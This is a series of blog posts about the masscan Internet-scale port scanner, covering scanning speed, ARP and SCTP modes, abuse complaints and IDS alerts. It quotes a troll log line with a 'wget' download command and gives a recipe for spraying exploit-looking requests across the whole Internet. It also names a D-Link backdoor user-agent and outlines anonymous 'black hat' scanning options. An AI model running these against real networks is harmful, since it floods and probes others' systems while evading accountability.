That Apache 0day was troll

Last week, many people saw what they thought was an Apache 0day. They say logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”

Somebody has come forward and taken credit for this, admitting it was troll.

This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.

I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:

apt-get install libpcap-dev dos2unix

git clone https://github.com/robertdavidgraham/masscan

cd masscan

make

echo "GET /my0dayexploit.php?a=\x0acat+/etc/password HTTP/1.0" >header.txt

echo "Referer: http://troll.com" >>header.txt

echo "" >>header.txt

unix2dos header.txt

iptables -A INPUT -p tcp --destination-port 4321 -j DROP

bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-port 4321 --rate 1500000

Depending on the rate your VPS can transmit, you'll cover the entire Internet in one to ten hours.

The response output from servers will be printed to the screen. You probably don't want that, so you should add the "-oX troll.xml" to save the responses to an XML file.

The above example uses "echo" to append lines of text to a file since HTTP is conveniently a text-based protocol. Its uses "unix2dos" to convert the line-feeds into the cr-lf combination that HTTP wants.

Masscan has it's own TCP/IP stack. Thus, on Linux, it can't establish a TCP connection, because when it tries, the existing TCP stacks sees something wrong and sends a RST to kill the connection. One way to prevent this is to configure a firewall rule to tell the built-in Linux TCP/IP stack to ignore the port that masscan uses. Another way is to tell masscan to use a --source-ip that isn't assigned to any existing machine on the network.

The rates at which you can transmit vary widely by hosting provider. In theory, you should get a rate of 1.5-million packets/second, and that's easily obtained in a lab on slow machines. Yet, in real hosting environments, things slow down, and I haven't been able to figure out why. In my experience, 300,000 is more of what you'd expect to get.

Masscan supports SCTP

Besides the well-known transport protocols of TCP and UDP, there is also one called SCTP. It's been included in Windows, Linux, Mac OS X for 10 years. Almost nobody uses it. I know little more about this protocol than you do.

But I can now scan for it in masscan. Scanning the entire Internet for an SCTP service would look something like this:

masscan 0.0.0.0/0 -pS:36422,36412 --rate 100000

BTC 0.1 for 'masscan' logo

I've written a tool 'masscan' that's become more popular than I thought it would be. I've decided I need a logo for it. I'm paying 0.1 Bitcoin for anybody that sends me a logo that I use. The only acceptance criteria is that I actually start using the logo. 0.1 bitcoin is only $80 at today's exchange rate, so it's not a lot of money. If you feel your time is worth more, then tell me how much it's worth: I can't start using the logo if I don't pay your price. Conversely, if I get one logo and start using it, then the next day somebody else comes up with a better logo, I'll have to pay both people: using the logo constitutes acceptance.

The following post is some information that may help you design a logo.

Masscan: diagnosing slow transmit speeds

My port scanner (masscan) can easily transmit at full 1-gbps speeds, even from a slow laptop. Yet, often when you run it, it fails to run that fast. Instead of 1.488 million packets/second, it does only 0.2 million packets/second. Why is that?

There are lots of reasons, but the biggest is probably "flow control" on the Ethernet switch.

Masscan: designing my own crypto

Like many programmers, one of the things I like to do is design my own crypto algorithms. Specifically, at the heart of my port-scanner masscan is a cryptographic algorithm for randomizing IP addresses and port numbers.

This algorithm has flaws. Well, it's good enough for port scanning, but it's not cryptographically secure. In this post, I describe how graph stuff so that these flaws can be detected. Update: I added a second nmap sample to compare against.

Masscan does ARP

My portscanner, masscan, also does ARP scanning. Sure, there exists other ARP scanning tools (like arpscan), but I'm too lazy to learn how they work, so I just added the functionality to my tool.

Here's how you use it. Right now I'm plugged into the local wired Ethernet. When I do an ifconfig, I get the following result:

inet 10.59.36.10 netmask 0xffff0000 broadcast 10.59.255.255

That means there is an entire /16 of devices out there. I want to discover them, so I run masscan with the following parameters:

masscan 10.59.0.0/16 --arp --source-ip 10.59.36.200 --source-mac 66-55-44-33-22-11 --rate 1000

This produces results that look like:

Starting masscan 1.0 (http://bit.ly/14GZzcT) at 2013-12-28 04:39:52 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 65536 hosts [1 port/host]
Discovered open port 0/arp on 10.59.1.1 
Discovered open port 0/arp on 10.59.30.11
Discovered open port 0/arp on 10.59.30.4
Discovered open port 0/arp on 10.59.33.187
Discovered open port 0/arp on 10.59.31.46
Discovered open port 0/arp on 10.59.33.151
...

There's some weirdness in the how it displays the results. It claims things are "ports" because masscan is port scanner, even though ARP has no ports. I should probably fix this.

In the above example I spoof the source IP and MAC address. This isn't strictly necessary, because if you don't specify it, masscan will use use the IP/MAC of your current configuration. But in general, masscan should always be used in spoofing mode, so I include it on general principles.

The reason I added it is because on the flight back from BruCon (a Belgian cybsec convention), I was upgraded to business class, which had an Ethernet port. Attaching a cable to the Ethernet gave me link status, but no DHCP results. Also, tcpdump revealed no packets at all coming from the port. Therefore, I needed to scan the port to see if anything was listening, so I quickly added the ARP scanning code to masscan, then blasted the port. I first scanned the private address ranges, then the rest of the Internet address ranges. Despite being a 100-mbps, I can just about scan the entire 32-bit address space in the 10 hours of the flight. I didn't find anything, but that could be because transmitting at 150,000 ARP requests per second can overwhelm whatever device they have on the other end that might respond.

That last point is pretty important: transmitting ARP packets are sent to the broadcast address (ff-ff-ff-ff-ff-ff), and thus, are received by every machine on the local link. Masscan is very fast, usually faster than the receiving machines can handle. You can easily go too fast, causing receiving machines to drop packets. They cannot respond to a request if they drop it. Thus, you'll miss results at high speeds that you'd otherwise get at a slow speed. And, you might DoS machines on the local segment, which will anger people.

One issue is the right IP address to use. As far as I can tell, testing with Windows, Mac OS X, and Linux, any IP address can be used. Let's say a target machine has an IP address of 10.2.4.6, with a subnet mask of 255.255.255.0. In my tests, you can still use an IP address like 192.168.1.2 that is outside the target's subnet, and it'll still respond to the ARP.


Anyway, if you use masscan, just remember that instead of port numbers, you can specify --arp, and it'll do pretty much what you'd expect it to do.

CCC, 100-gbps, and your own private Shodan

One of the oldest/biggest "hacker" conventions is the CCC congress every December in Germany. This year, they are promising 100-gbps connectivity to the Internet. That's 'g' as in 'giga', and as in 'omfg that's a lot of bandwidth'.

So, what shall we do with all this bandwidth? The answer is masscan: scan the entire Internet and create your own, private, Shodan-style database.

That DLink bug (masscan)

This last weekend, an interesting backdoor was found in D-Link routers when a certain user-agent is set. How many Internet-accessible routers are vulnerable to this bug? Well, that sounds like a problem for 'masscan', my Internet-scale scanner.

Last Sunday I ran two scans of the Internet on port 80, one with the user-agent of "masscan/1.0", and the other with the offending user-agent of "xmlset_roodkcableoj28840ybtide", in order to see the difference. I still haven't processed the full results yet, because apparently, most of these devices run at port 8080 rather than port 80. On port 80, we found 2139 vulnerable devices, there should be a lot more at port 8080. Therefore tonight you are going to see my scanners pop up in your logs again, assuming you are monitoring what goes on at port 8080.

FAQ: from where can I scan the Internet?

I've written a program that can effortlessly scan the entire Internet (masscan). Unfortunately, scanning the Internet is against most "Acceptable Use Policies". Therefore, if you try to run it form your home network or a hosting environment (like the Amazon cloud), they'll quickly shut you down. Where, then, can legitimate researchers run this tool?

I don't know a good answer. We work closely with a hosting provider. We give them free consulting, such as pentesting and incident analysis. We handle all the abuse complaints ourselves, responding quickly to them, and adding anybody who asks to our "exclude" list. They in turn allow us to do something that most hosting providers would not.

It's not that scanning is intrinsically bad or illegal, it's just that it's associated with hackers/scammers/spammers. If they know that you are a good guy, most hosting companies wouldn't care. Your struggle is to convince them that you are a good guy.

But frankly, being the good guy is a lot of hassle. I don't mind being called a "fucking asshole" in the abuse complaints (which happens), but I do mind the legal threats. I'm extremely open and transparent about my scans, documenting when I do them, what I'm doing, the raw results, and the source code of the tool I use. Yet, all this can become evidence in a trial in the modern climate of over-prosecution of researchers. It might be safer to take the black hat route.

The black hat route is to anonymously get some bitcoins (such as off Craig's list or at the local park of your city), then use hosting environments that accept bitcoins. You'll pay about $10 to $20 for a VPS (virtual private server), and then download and run masscan. By the time they get around to canceling your account, you can complete a single scan of a port on the Internet. Running masscan, it's about 10 hours running at 100,000 packets/second or 40-mbps. VPSs can easily go faster than that on gigabit connections, such as 400,000 packets/second.

Another black hat route is to go to the scammer-friendly ISPs, the ones who already host hackers, spammers, gambling sites, and porn sites. There are a lot of them in China, Russia, and the Caribbean.

Then there is the well-known technique of compromising desktops around the world and distributing your scan across them. Masscan hqas a lot of good features for dividing scans across machine, though if you are going this route, you should probably use nmap instead. Masscan is for one massive scan from a small number of machines, nmap is better at small scans from a massive number of machines. You'd be breaking a bunch of laws just compromising those machines in the first place, so of course I wouldn't recommend it, it's just something that others have done.

The Internet is designed to be an "end-to-end" network, where such massive scanning is as normal as spidering websites for search engines. A lot of people aren't happy about this, of course, but such scanning is intrinsic to the design of the Internet. Moreover, the more we know about the state of the Internet, the better we can secure it. It's astonishing how little people know about what's listening on the Internet. The more we do this, and publish our results, the better off the Internet will be.

If anybody has better strategies on where to scan from, please drop me a comment. I'd love to see more scanning.

What's the max speed on Ethernet?

My port scanner (masscan) can transmit at the maximum speed of Ethernet. So what does that mean?

A 1-gbps Ethernet link has the precise bit-rate of 1000000000.0 bits-per-second (bps). Depending on the accuracy of the clock oscillator, this may be a few bps faster or slower, but at least this is the standard rate.

But for port scanning, the more important metric is "packets-per-second" (pps). We have to divided the bit rate by packet size in order to get the packet rate. In this post, I "show my work" showing the math to derive this.

Fun with IDS funtime, part 2

As I posted last week, intrusion detection systems (IDS) are catching me doing Internet-scale surveys. This gives me a chance to try and evade them. Of course, once I evade them, I have to document my tricks, so they can catch me again -- because I'm not actually trying to go undetected. I'm just having fun.

My latest trick involves DNS and the "version.bind" detection. You can query the version information of a DNS server by sending a "chaos txt version.bind" query to it instead of a normal query like www.google.com. The Snort signature that detects this looked like the following:

Fun with IDS funtime

We've been scanning the entire Internet for a while, and amuse ourselves reading the "abuse" complaints. Those with firewalls dropping the packets are sensible, and send relatively sane requests on the matter. Those with IDS (intrusion detection systems) are sometimes a bit hysterical, using automated messages claiming that we are "hacking" them and that are activity is "illegal". They have too much faith that when an IDS labels something as an "intrusion" that the IDS is telling the truth.

I'm scanning udp/161 (SNMP) right now

I'm scanning the entire Internet for SNMP (UDP port 161) right now:

masscan 0.0.0.0/0 -pU:161 --banners

SNMP is the "simple network management protocol", which is the Internet standard monitoring devices (like temperature and traffic rates), getting alerts from devices (like when the power fails), and most importantly, controlling devices. It's such a dangerous protocol that it should never be exposed to the public Internet. I should get back zero responses to my scan -- but I'm getting millions.

I'm scanning udp/53 right now

So I'm scanning the Internet with a DNS version request, because it'd be a useful datapoint in my Friday #Brucon talk mentioning that BIND is still the overwhelming favorite DNS server on the Internet. The abuse reports are an interesting read, such as one that claims "This activity is neither just a scanning nor unexpected attempts, but a sophisticated attack". Nope, it's just scanning, and terribly unsophisticated.

Masscan: the entire Internet in 3 minutes

I thought I'd write up some notes about my "masscan" port mapper.

Masscan is the fastest port scanner, more than 10 times faster than any other port scanner. As the screenshot shows, it can transmit 25 million packets/second, which is fast enough to scan the entire Internet in just under 3 minutes. The system doing this is just a typical quad-core desktop processor. The only unusual part of the system is the dual-port 10-gbps Ethernet card (most computers have only 1-gbps Ethernet).

Masscan is a typical "async/syn-cookie" scanner like 'scanrand', 'unicornscan', and 'ZMap'. The distinctive benefits of masscan are:

1. speed
2. better randomization
3. flexibility
4. compatibility

These are described in more detail below.

We scanned the Internet for port 22

Yesterday (Sept. 12) we scanned the entire Internet for port 22 -- the port reserved for "SSH", the protocol used by sysadmins to remotely log into machines.  Unlike our normal scans of port 80 or 443, this generated a lot more "abuse" complaints, so I thought I'd explain the scan.

Firstly, we'll happily add you to our "blacklist", so that we won't scan you ever again (barring accidents on our part). Our current blacklist is hundreds of entries long. However, please consider adding our scanner (71.6.151.167) to your "whitelist". We are well-known cyber-sec researchers, we aren't trying anything nefarious or evil, and we are being as transparent as possible about our scans.

Our scanner was just checking banners. It didn't complete the connection, nor did it try any passwords. Several abuse complaints assumed that we were trying to "login", but we weren't. Yes, hackers are constantly trying to login into SSH servers, so it's a good assumption to make, it's just that in this case, it doesn't apply to us.